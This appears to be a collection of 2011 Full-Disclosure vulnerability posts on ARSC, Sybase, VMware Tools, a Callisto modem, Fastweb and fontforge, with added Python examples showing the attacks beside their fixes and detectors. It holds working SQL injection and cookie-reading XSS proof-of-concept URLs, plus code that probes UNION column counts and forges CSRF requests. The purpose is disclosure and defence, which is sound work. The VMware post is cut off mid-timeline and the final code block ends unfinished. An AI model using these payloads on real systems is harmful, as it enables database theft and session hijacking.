Re: [Full-disclosure] HTB22999: Multiple SQL Injections in A Really Simple Chat (ARSC)
On Wed, Jun 01, 2011 at 02:10:13PM +0200, advis...@htbridge.ch wrote:
> Vulnerability ID: HTB22999
> Reference: http://www.htbridge.ch/advisory/multiple_sql_injections_in_a_really_simple_chat_arsc.html
> Product: A Really Simple Chat (ARSC)
> Vendor: http://www.reallysimplechat.org/
> Vulnerable Version: 3.3-rc2
> Vendor Notification: 12 May 2011
> Vulnerability Type: SQL Injection
> Risk level: High
> Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
>
> Vulnerability Details:
> The vulnerability exists due to failure in the /base/admin/edit_user.php script to properly sanitize user-supplied input in the user variable. An attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
>
> The following PoC is available:
> http://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
>
> The vulnerability exists due to failure in the /base/admin/edit_layout.php script to properly sanitize user-supplied input in the arsc_layout_id variable.
>
> The following PoC is available:
> http://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
>
> The vulnerability exists due to failure in the /base/admin/edit_room.php script to properly sanitize user-supplied input in the arsc_room variable.
>
> The following PoC is available:
> http://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

These issues can be referred to as CVE-2011-2181. Could you please update the www-site advisory?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
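The three PoCs above are union-based injections: a quote (or, for the numeric arsc_layout_id, nothing at all) ends the intended WHERE clause, a UNION SELECT with exactly as many columns as the original query appends attacker-chosen rows, and a trailing comment swallows the rest of the statement. The example below is an added illustration, not ARSC code: it reproduces the vulnerable and the fixed query against an in-memory SQLite table whose name, three columns and row are constructed here, and it swaps MySQL's version() for SQLite's sqlite_version(). It also shows the probing loop the 15- and 20-column payloads imply, since the attacker has to discover the column count before the UNION parses.

```python
"""Union-based SQL injection of the shape reported for ARSC's edit_user.php,
reproduced against an in-memory SQLite table.  Added example: the table, its
three columns and every function here are constructed for illustration; ARSC
itself is PHP/MySQL, so MySQL's version() becomes sqlite_version()."""
import sqlite3
from urllib.parse import unquote


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE arsc_user (id INTEGER, user TEXT, password TEXT)")
    conn.execute("INSERT INTO arsc_user VALUES (1, 'admin', 'hunter2')")
    conn.commit()
    return conn


def edit_user_vulnerable(conn, arsc_user):
    # The flaw the advisory describes: the request parameter is spliced into the
    # SQL text, so a quote in it ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT id, user, password FROM arsc_user WHERE user = '{arsc_user}'"
    return conn.execute(sql).fetchall()


def edit_user_fixed(conn, arsc_user):
    # Bound parameter: the value travels separately from the statement text, so the
    # quote, UNION and comment in a payload are compared against the column as data.
    sql = "SELECT id, user, password FROM arsc_user WHERE user = ?"
    return conn.execute(sql, (arsc_user,)).fetchall()


def find_union_column_count(conn, max_columns=20):
    """The probing step the PoCs imply: lengthen the UNION SELECT list until the
    database stops raising a column-count mismatch.  Returns the count or None."""
    for n in range(1, max_columns + 1):
        probe = "-1' UNION SELECT " + ",".join(str(i) for i in range(1, n + 1)) + " -- "
        try:
            edit_user_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# The advisory's first PoC, URL-decoded, with the column list cut down to the
# constructed table's three columns: -1' union select 1,sqlite_version(),3 -- 2
PAYLOAD = unquote("-1%27%20union%20select%201,sqlite_version%28%29,3%20--%202")

if __name__ == "__main__":
    db = setup_db()
    print("columns:", find_union_column_count(db))
    print("vulnerable:", edit_user_vulnerable(db, PAYLOAD))
    print("fixed:", edit_user_fixed(db, PAYLOAD))
```

The fixed variant returns no rows for the payload because the whole string, quote and UNION included, is compared against the user column; the vulnerable variant returns a row whose middle column is the database version, which is exactly what the PoC URLs display.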
Re: [Full-disclosure] HTB22997: XSS in A Really Simple Chat (ARSC)
On Wed, Jun 01, 2011 at 02:10:31PM +0200, advis...@htbridge.ch wrote:
> Vulnerability ID: HTB22997
> Reference: http://www.htbridge.ch/advisory/xss_in_a_really_simple_chat_arsc.html
> Product: A Really Simple Chat (ARSC)
> Vendor: http://www.reallysimplechat.org/
> Vulnerable Version: 3.3-rc2
> Vendor Notification: 12 May 2011
> Vulnerability Type: XSS (Cross Site Scripting)
> Risk level: Medium
> Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
>
> Vulnerability Details:
> User can execute arbitrary JavaScript code within the vulnerable application.
>
> The vulnerability exists due to failure in the dereferer.php script to properly sanitize user-supplied input in the arsc_link variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
>
> The following PoC is available:
> http://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

This can be referred to as CVE-2011-2180. Could you please update your www-site advisory?

Best regards,
Henri Salo
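The PoC payload decodes to `"><script>alert(document.cookie);</script>`: the leading `">` closes the href attribute that dereferer.php writes the link into, and what follows is live markup. The snippet below is an added example, not ARSC's dereferer.php (whose exact output is not on the page): it models the reported attribute-context injection and the two checks a dereferer page should apply, an http(s)-only allowlist on the link and attribute-safe escaping of anything echoed back. The `rel="noreferrer"` attribute is my addition, since hiding the referrer is the one job a dereferer has.

```python
"""Reflected XSS in an href attribute, as reported for ARSC's dereferer.php,
beside a hardened rendering.  Added example; not code from ARSC."""
import html
from urllib.parse import unquote, urlsplit

# The advisory's PoC, URL-decoded: "><script>alert(document.cookie);</script>
PAYLOAD = unquote("%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E")


def dereferer_vulnerable(arsc_link):
    # Models the reported flaw: the parameter lands unescaped inside an attribute,
    # so a double quote in it ends the attribute and '>' ends the tag.
    return f'<a href="{arsc_link}">{arsc_link}</a>'


def dereferer_fixed(arsc_link):
    # 1. A dereferer only needs to forward absolute http(s) URLs; anything else
    #    (javascript:, data:, relative paths, bare markup) is refused outright.
    parts = urlsplit(arsc_link)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("dereferer only forwards absolute http(s) links")
    # 2. Escape for the attribute context: quote=True turns '"' into &quot;,
    #    which is what keeps the href from being closed early.
    safe = html.escape(arsc_link, quote=True)
    return f'<a href="{safe}" rel="noreferrer">{safe}</a>'


def injects_script(rendered_html):
    """True if a <script tag survived into the rendered page."""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print(dereferer_vulnerable(PAYLOAD))
    print(dereferer_fixed("https://example.com/?q=" + PAYLOAD))
```

Note that escaping alone is not enough for an href: `javascript:alert(1)` contains nothing html.escape would touch, which is why the scheme check comes first.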
Re: [Full-disclosure] What are some of the top ...
On Thu, Jun 02, 2011 at 03:29:01PM -0700, t0hitsugu wrote:
> While I make no claims of being a security professional, the absolute best thing you can do is look into schools that will lead to the prestigious CEH certification, highly valued in the infosec community, which will teach you to use complex tools like sqlmap, nmap, and if you're skilled enough, metasploit.

I suppose the current measure for eliteness is #CVEs(R) per second :)

--
joro
Re: [Full-disclosure] What are some of the top ...
1) Fix CVSS from disastrously broken to slightly broken or better
2) eliteness = #CVE * avg CVSS / sec + coolpoints
3) eliteness *= (taking credit for other people's vulns and known issues) ? 0 : 1

On Fri, Jun 3, 2011 at 6:28 AM, Georgi Guninski gunin...@guninski.com wrote:
> On Thu, Jun 02, 2011 at 03:29:01PM -0700, t0hitsugu wrote:
>> While I make no claims of being a security professional, the absolute best thing you can do is look into schools that will lead to the prestigious CEH certification, highly valued in the infosec community, which will teach you to use complex tools like sqlmap, nmap, and if you're skilled enough, metasploit.
>
> I suppose the current measure for eliteness is #CVEs(R) per second :)
>
> --
> joro
[Full-disclosure] ZDI-11-171: Sybase OneBridge Mobile Data Suite Format String Remote Code Execution Vulnerability
ZDI-11-171: Sybase OneBridge Mobile Data Suite Format String Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-171
June 3, 2011

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Sybase

-- Affected Products:
Sybase OneBridge

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11288. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sybase OneBridge Mobile Data Suite. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the iMailGatewayService server process (ECTrace.dll), which listens for encrypted requests by default on TCP port 993 (IMAP) and port 587 (SMTP). The process fails to properly sanitize malformed user string inputs before passing them to the authentication logging function. By providing a specially crafted string with format specifiers, this can be leveraged to trigger a format string vulnerability which can lead to arbitrary code execution in the context of the server process.

-- Vendor Response:
Sybase has issued an update to correct this vulnerability. More details can be found at:
http://www.sybase.com/detail?id=1092074

-- Disclosure Timeline:
2011-01-21 - Vulnerability reported to vendor
2011-06-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Luigi Auriemma

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:
http://twitter.com/thezdi
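The bug class the advisory describes is a user-controlled string reaching the logging function as its format argument; in C the fix is to log it through a fixed format (`"%s"`) so that `%x`, `%s` and `%n` in a username are printed rather than interpreted. The advisory does not publish the request or log formats, so the added example below is detection-side only and not Sybase or ZDI code: it recognises printf-style conversion specifiers, treats any `%n` (a write) or a run of specifiers as an attack attempt, and runs that over constructed authentication-failure log lines whose layout is invented here. It also shows the main false-positive trap, a legitimate `%40` (URL-encoded `@`) in a username, which the threshold leaves alone.

```python
"""Heuristic detection of printf-style format-string payloads in authentication
usernames, run over constructed log lines.  Added example: neither the log
layout nor the patterns come from Sybase OneBridge or the ZDI advisory."""
import re

# %[argpos$][flags][width][.precision][length]conversion
FORMAT_SPEC = re.compile(
    r"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|q|j|z|t)?[diouxXeEfFgGaAcspn%]"
)


def format_string_stats(s):
    """Count conversion specifiers, splitting out the dangerous ones:
    %n writes to memory, %x/%X/%p/%s read the stack or dereference pointers."""
    specs = FORMAT_SPEC.findall(s)
    return {
        "specifiers": len(specs),
        "writes": sum(1 for t in specs if t.endswith("n")),
        "reads": sum(1 for t in specs if t[-1] in "xXps"),
    }


def looks_like_format_attack(s, threshold=2):
    """Any %n is enough on its own; otherwise require a run of specifiers, so a
    lone '%40' in 'bob%40example.com' does not trip the rule."""
    st = format_string_stats(s)
    return st["writes"] > 0 or st["specifiers"] >= threshold


# Constructed log lines in an invented layout; the real OneBridge format is not on the page.
SAMPLE_LOG = [
    "2011-06-03T10:00:01Z imap authentication failed for user 'alice' from 10.0.0.5",
    "2011-06-03T10:00:07Z imap authentication failed for user '%x%x%x%x%n' from 10.0.0.7",
    "2011-06-03T10:00:09Z smtp authentication failed for user 'bob%40example.com' from 10.0.0.8",
    "2011-06-03T10:00:12Z imap authentication failed for user '%08x.%08x.%08x.%s' from 10.0.0.9",
]

LINE_RE = re.compile(r"authentication failed for user '(?P<user>.*)' from (?P<src>\S+)")


def scan(lines):
    """Return (source address, username) for every line whose username looks like
    a format-string probe."""
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if m and looks_like_format_attack(m["user"]):
            hits.append((m["src"], m["user"]))
    return hits


if __name__ == "__main__":
    for src, user in scan(SAMPLE_LOG):
        print(f"format-string probe from {src}: {user!r}")
```

The `%08x.%08x.%08x.%s` shape is the classic stack-walking probe an attacker sends first to find where their input sits on the stack; seeing it, or any `%n`, in an unauthenticated login attempt against an IMAP or SMTP listener is worth an alert on its own.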
[Full-disclosure] VMware Tools Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                           VSR Security Advisory
                         http://www.vsecurity.com/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   Advisory Name: VMware Tools Multiple Vulnerabilities
    Release Date: 2011-06-03
     Application: VMware Guest Tools
        Severity: High
          Author: Dan Rosenberg drosenberg (at) vsecurity.com
   Vendor Status: Patch Released [2]
   CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146
       Reference: http://www.vsecurity.com/resources/advisory/20110603-1/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
- -------------------
From [1]:

  "VMware Tools is a suite of utilities that enhances the performance of the
   virtual machine's guest operating system and improves management of the
   virtual machine. Without VMware Tools installed in your guest operating
   system, guest performance lacks important functionality."

Vulnerability Overview
- ----------------------
On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a suite of utilities shipped by VMware with multiple product offerings, as well as by open-source distributions as the open-vm-tools package. The first of these issues results in a minor information disclosure vulnerability, while the second two issues may result in privilege escalation in a VMware guest with VMware Tools installed.

Product Background
- ------------------
VMware Tools includes mount.vmhgfs, a setuid-root utility that allows unprivileged users in a guest VM to mount HGFS shared folders. Also shipped with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which handles initial setup to prepare for running vmware-user, which grants users access to other utilities included with VMware Tools.

Vulnerability Details
- ---------------------
CVE-2011-2146:

The mount.vmhgfs utility makes a call to stat() to check for the existence and type (file, directory, etc.) of the user-supplied mountpoint, and provides an error message if the provided argument does not exist or is not a directory. Because mount.vmhgfs is setuid-root, a local attacker can leverage this behavior to identify if a given path exists in the guest operating system and whether it is a file or directory, potentially violating directory permissions.

CVE-2011-1787:

The mount.vmhgfs utility checks that the user-provided mountpoint is owned by the user attempting to mount an HGFS share prior to performing the mount. However, a race condition exists between the time this checking is performed and when the mount is performed. Successful exploitation allows a local attacker to mount HGFS shares over arbitrary, potentially root-owned directories, subsequently allowing privilege escalation within the guest.

CVE-2011-2145:

The vmware-user-suid-wrapper utility attempts to create a directory at /tmp/VMwareDnD. Next, it makes calls to chown() and chmod() to make this directory root-owned and world-writable. By placing a symbolic link at the location of this directory, vmware-user-suid-wrapper will cause the symbolic link target to become world-writable, allowing local attackers to escalate privileges within the guest. Only FreeBSD and Solaris versions of VMware Tools are affected.

Versions Affected
- -----------------
VMware's advisory [2] indicates the following product versions are affected:

VMware          Product    Running    Replace with/
Product         Version    on         Apply Patch
=============   ========   ========   =========================
vCenter         any        Windows    not affected
Workstation     7.1.x      Linux      7.1.4 or later*
Workstation     7.1.x      Windows    7.1.4 or later*
Player          3.1.x      Linux      3.1.4 or later*
Player          3.1.x      Windows    3.1.4 or later*
AMS             any        any        not affected
Fusion          3.1.x      OSX        Fusion 3.1.3 or later*
ESXi            4.1        ESXi       ESXi410-201104402-BG*
ESXi            4.0        ESXi       ESXi400-201104402-BG*
ESXi            3.5        ESXi       ESXe350-201105402-T-SG*
ESX             4.1        ESX        ESX410-201104401-SG*
ESX             4.0        ESX        ESX400-201104401-SG*
ESX             3.5        ESX        ESX350-201105406-SG*
ESX             3.0.3      ESX        not affected

The open-vm-tools package prior to version 2011.02.23-368700 is also affected.

Vendor Response
- ---------------
The following timeline details VMware's response to the reported issue:

2011-02-17  VMware receives initial vulnerability report
2011-02-17  VMware security team acknowledges receipt
2011-03-04  VMware provides status update
2011-03-04  VSR initiates discussion of disclosure date
2011-03-10  VMware responds, indicates internal coordination underway
2011-03-11  VSR
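CVE-2011-2145 and CVE-2011-1787 are the same shape of bug: a privileged program checks or creates a path, then acts on the path again, and between the two steps an attacker substitutes a symlink. The added example below (not VMware or VSR code; the helper names and the temporary layout are mine) reproduces the /tmp/VMwareDnD pattern in Python on an ordinary user's own temporary directory, so it runs unprivileged: a path-based chmod() follows a planted symlink and makes the victim directory world-writable, while the hardened version opens the directory with O_NOFOLLOW|O_DIRECTORY, verifies the owner on the descriptor it actually opened, and chmods that descriptor, so the symlink is refused with ELOOP and nothing is left to race.

```python
"""Symlink attack on a mkdir-then-chmod-by-path sequence, as described for
/tmp/VMwareDnD in CVE-2011-2145, beside a descriptor-based fix.  Added
example, not VMware Tools code; runs as an unprivileged user inside its own
temporary directory.  POSIX only (O_NOFOLLOW, O_DIRECTORY, fchmod)."""
import errno
import os
import stat
import tempfile


def prepare_shared_dir_unsafe(path, mode=0o1777):
    """The vulnerable pattern: create, then chmod by path.  If a symlink already
    sits at `path`, mkdir fails with EEXIST and chmod follows the link."""
    try:
        os.mkdir(path)
    except FileExistsError:
        pass
    os.chmod(path, mode)  # follows symlinks: the *target* becomes world-writable
    return path


def prepare_shared_dir_safe(path, mode=0o1777):
    """Hardened: never touch the path twice.  Open whatever is there without
    following symlinks, check it is our own directory, then fchmod the fd."""
    try:
        os.mkdir(path, mode)
    except FileExistsError:
        pass  # fall through and inspect what actually exists at `path`
    try:
        fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    except OSError as e:
        if e.errno in (errno.ELOOP, errno.ENOTDIR):
            raise PermissionError(f"{path} is not a plain directory; refusing to chmod")
        raise
    try:
        st = os.fstat(fd)
        if st.st_uid != os.geteuid():
            raise PermissionError(f"{path} owned by uid {st.st_uid}; refusing to chmod")
        os.fchmod(fd, mode)  # acts on the object we inspected, not on the name
    finally:
        os.close(fd)
    return path


def mode_of(path):
    return stat.S_IMODE(os.lstat(path).st_mode)


def demo_symlink_attack():
    """Plant <tmp>/VMwareDnD -> <tmp>/victim (mode 0700), run both variants.
    Returns (victim mode after unsafe, victim mode after safe, safe raised)."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim")
        os.mkdir(victim)
        os.chmod(victim, 0o700)
        link = os.path.join(tmp, "VMwareDnD")
        os.symlink(victim, link)  # the attacker's move, made before the suid program runs

        prepare_shared_dir_unsafe(link)
        after_unsafe = mode_of(victim)

        os.chmod(victim, 0o700)  # reset, then try the hardened version
        try:
            prepare_shared_dir_safe(link)
            safe_raised = False
        except PermissionError:
            safe_raised = True
        return after_unsafe, mode_of(victim), safe_raised


def demo_fresh_dir():
    """Without an attacker the safe variant still creates the 1777 directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return mode_of(prepare_shared_dir_safe(os.path.join(tmp, "VMwareDnD")))


if __name__ == "__main__":
    unsafe, safe, raised = demo_symlink_attack()
    print(f"unsafe: victim mode {unsafe:o}; safe: victim mode {safe:o}, refused={raised}")
    print(f"fresh directory via safe path: {demo_fresh_dir():o}")
```

The same rule fixes the mount.vmhgfs race (CVE-2011-1787): once the mountpoint has been opened and its owner checked via fstat(), the mount has to be performed relative to that descriptor (or after re-verifying it), not by re-resolving the path name the attacker can still swap underneath.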
[Full-disclosure] New CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
Hello list!

I want to warn you about security vulnerabilities in the ADSL modem Callisto 821+ (SI2000 Callisto821+ Router). These are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities, which I've found in your modem. In April I already drew the attention of Ukrtelecom's representative (this modem was bought at Ukrtelecom) to multiple vulnerabilities in this model of Callisto modems (and other models could also be affected).

SecurityVulns ID: 11700.

-------------------
Affected products:
-------------------

The following model is vulnerable: SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other firmware, and also other models of Callisto, must also be vulnerable.

----------
Details:
----------

These attacks should be conducted on the modem owner while he is logged into the control panel. Taking into account that it's unlikely to catch him in this state, it's possible to use the before-mentioned vulnerabilities (http://websecurity.com.ua/5161/) to conduct a remote login (logging him into the control panel). After that it's possible to conduct the CSRF or XSS attack.

CSRF (WASC-09):

This vulnerability allows adding a DNS server in the modem's settings, which allows conducting spoofing, phishing and DNS Rebinding attacks on users who go to the Internet via this modem.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20CSRF8.html

XSS (WASC-08):

In this form there are also 3 persistent XSS vulnerabilities.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS10.html

In this case the code will be executed immediately, and also on visiting the pages http://192.168.1.1/system/events.html and http://192.168.1.1/shared/event_log_selection.html.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS11.html

In this case the code will be executed immediately, and also on visiting the pages http://192.168.1.1/system/events.html and http://192.168.1.1/shared/event_log_selection.html.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS12.html

In this case the code will be executed immediately, and also on visiting the pages http://192.168.1.1/system/events.html and http://192.168.1.1/shared/event_log_selection.html.

Timeline:

2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in the modems which they give (sell) to their clients.
2011.05.31 - disclosed at my site.
2011.06.01 - informed the developers (Iskratel).

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/5182/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
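The CSRF above works because the modem's DNS-settings handler trusts nothing but the session cookie, which the victim's browser attaches to any request a third-party page provokes. The added example below is not Callisto firmware code: it models a settings handler with the three checks that close the hole, a POST-only rule (so an `<img src>` or link cannot change state), an Origin/Referer check against the device's own UI origin, and a per-session token derived as HMAC(device secret, session id) that a cross-site page cannot read. The device secret, the UI origin 192.168.1.1 (taken from the page URLs), the session table and the request shape are constructed for the example.

```python
"""CSRF protection for a router settings form, modelled on the DNS-server
change described for the Callisto 821+.  Added example; not Callisto/Iskratel
code.  The secret, sessions and request layout are constructed here."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

DEVICE_SECRET = secrets.token_bytes(32)        # per-device, generated at first boot (assumed)
UI_ORIGIN = "http://192.168.1.1"               # the modem's own control-panel origin
SESSIONS = {"s1": {"user": "admin", "dns": []}}  # one logged-in admin, constructed


def issue_csrf_token(session_id):
    """Token bound to one session; verification needs no server-side storage."""
    return hmac.new(DEVICE_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, token):
    return bool(token) and hmac.compare_digest(issue_csrf_token(session_id), token)


def request_origin(headers):
    """Origin header if present, else the origin part of Referer, else None.
    Browsers send Origin on cross-site POSTs; an absent value is treated as hostile."""
    origin = headers.get("Origin")
    if origin is None and headers.get("Referer"):
        p = urlsplit(headers["Referer"])
        origin = f"{p.scheme}://{p.netloc}"
    return origin


def handle_set_dns(request):
    """request = {"method", "headers", "cookies", "form"}; returns (status, detail)."""
    if request["method"] != "POST":
        return 405, "state changes require POST"        # defeats GET-based CSRF
    sid = request["cookies"].get("sid")
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    if request_origin(request["headers"]) != UI_ORIGIN:
        return 403, "cross-origin request refused"
    if not verify_csrf_token(sid, request["form"].get("csrf")):
        return 403, "bad or missing CSRF token"
    session["dns"].append(request["form"]["dns1"])
    return 200, "dns updated"


def legitimate_request():
    """What the modem's own settings page submits: same origin, token from the form."""
    return {"method": "POST",
            "headers": {"Origin": UI_ORIGIN},
            "cookies": {"sid": "s1"},
            "form": {"dns1": "192.168.1.1", "csrf": issue_csrf_token("s1")}}


def forged_request(method="POST"):
    """What a page on attacker.example can make the victim's browser send: the
    cookie rides along, but the token does not and Origin names the attacker."""
    return {"method": method,
            "headers": {"Origin": "http://attacker.example"},
            "cookies": {"sid": "s1"},
            "form": {"dns1": "203.0.113.53"}}


if __name__ == "__main__":
    print(handle_set_dns(legitimate_request()))
    print(handle_set_dns(forged_request()))
    print(handle_set_dns(forged_request("GET")))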
[Full-disclosure] Warning is about vulnerability
Hello is list!! I is like to warn you is about vulnerability. Is vulnerability is what get Sony, RSA, L3, Google and is Hilary Clinton hacked. Please is watch vulnerabilities and is never forgot when is you use !! many times, is many more take your advisories is serious!!

http://www.thinkgeek.com/tshirts-apparel/unisex/popculture/78c6/

--
`I am epic win`
[Full-disclosure] Fastweb MyFastpage Authentication Bypass
Fastweb, an Italian service provider, has an XSS flaw that permits bypassing authentication and logging into users' account control panels. The attacker must lure Fastweb users to a malicious web page to steal the authentication token with XSS.

The control panel, called MyFastPage, permits changing the Fastweb account password and FastMail password, online billing, configuring home LAN port mapping, private data, address and billing information, and buying additional services, charging the cost to the user.

Here is the working PoC [Italian]:
http://disse.cting.org/codes/fastweb.html

Here is the blog article [Italian]:
http://disse.cting.org/security-2/fastweb-myfastpage-panel-control-hack/
[Full-disclosure] [SECURITY] [DSA 2253-1] fontforge security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2253-1                   secur...@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
June 3, 2011                           http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : fontforge
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2010-4259
Debian Bug     : 605537

Ulrik Persson reported a stack-based buffer overflow flaw in FontForge, a font editor. When processing a crafted Bitmap Distribution Format (BDF) file, FontForge could crash or execute arbitrary code with the privileges of the user running FontForge.

For the oldstable distribution (lenny), this problem has been fixed in version 0.0.20080429-1+lenny2.

The stable distribution (squeeze), testing distribution (wheezy), and unstable distribution (sid) are not affected by this problem.

We recommend that you upgrade your fontforge packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJN6TbqAAoJEOxfUAG2iX57sXUH/jq43XDXkz8o03rw2Xm7kvnX
VGIrbvo3RGEZ2Pg2fNSIGx1F4MeuMrwA5+dm46mGqYzHvV54+aexIvY1b8bLJ/B3
YmNw0iQa5SSS4zFW+4vDAc5+UI/NqL6EsStdlELdBW0cXNaIUofxCnFl9SUuWb7z
D9Btrc09mfYs44VrarYm1YaOTT9NexIQzadvaLAHOwRuAR6mK3YrKcQhuR2Hblz6
ObMXTHaGpmHXCQx9nRPMDr2I/oA0ipiu7N9wzELs/Z2eiKda2Xhq0t+CqRjIOH5c
r0GAxZxHOlqwfBh3ouPlBaTLlltvHN7jsLG6Ojf1f/S6D88mkpIi88Mkj4wElNo=
=bA8W
-----END PGP SIGNATURE-----
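The advisory gives only the class of bug (a stack buffer overflow while reading a crafted BDF file), not the field involved, so the added example below does not reproduce FontForge's bug. It shows what a length-checked reader of the format looks like, since BDF is a text format in which a glyph declares its dimensions (BBX width height xoff yoff) and then supplies hex bitmap rows; a parser that sizes a buffer from the declaration and then copies rows without checking them against it is exactly where such overflows live. The parser, the constructed good font and the three malformed variants are mine, not FontForge or Debian code.

```python
"""Bounds-checked reader for the glyph section of a BDF font.  Added example;
not FontForge code and not a reproduction of CVE-2010-4259.  Every declared
size is checked against the data that follows before anything is stored."""


def parse_bdf(text, max_dim=256):
    """Return {encoding: [row_int, ...]} for each STARTCHAR..ENDCHAR block.
    Raises ValueError on any mismatch between BBX and the BITMAP rows."""
    lines = iter(text.splitlines())
    glyphs = {}
    for line in lines:
        if not line.startswith("STARTCHAR"):
            continue
        name = line.split(None, 1)[1] if " " in line else "?"
        encoding, bbx = None, None
        for line in lines:  # continue on the same iterator inside the glyph
            tok = line.split()
            if not tok:
                continue
            if tok[0] == "ENCODING":
                encoding = int(tok[1])
            elif tok[0] == "BBX":
                w, h = int(tok[1]), int(tok[2])
                if not (0 < w <= max_dim and 0 < h <= max_dim):
                    raise ValueError(f"{name}: BBX {w}x{h} out of range")
                bbx = (w, h)
            elif tok[0] == "BITMAP":
                if bbx is None:
                    raise ValueError(f"{name}: BITMAP before BBX")
                w, h = bbx
                row_hex = 2 * ((w + 7) // 8)  # rows are byte-padded, two hex digits per byte
                rows = []
                for line in lines:
                    row = line.strip()
                    if row == "ENDCHAR":
                        break
                    if len(rows) >= h:
                        raise ValueError(f"{name}: more than {h} bitmap rows")
                    if len(row) != row_hex:
                        raise ValueError(f"{name}: row {len(rows)} has {len(row)} hex digits, expected {row_hex}")
                    rows.append(int(row, 16))  # non-hex raises ValueError too
                else:
                    raise ValueError(f"{name}: missing ENDCHAR")
                if len(rows) != h:
                    raise ValueError(f"{name}: {len(rows)} rows, BBX declared {h}")
                glyphs[encoding] = rows
                break
    return glyphs


def rejects(text):
    """None if the font parses, else the rejection message (for the demo below)."""
    try:
        parse_bdf(text)
        return None
    except ValueError as e:
        return str(e)


# Constructed minimal font: one 5x8 glyph for 'A'.
GOOD_BDF = "\n".join([
    "STARTFONT 2.1",
    "FONT -misc-fixed-medium-r-normal--8-80-75-75-c-50-iso8859-1",
    "SIZE 8 75 75",
    "FONTBOUNDINGBOX 5 8 0 -1",
    "CHARS 1",
    "STARTCHAR A",
    "ENCODING 65",
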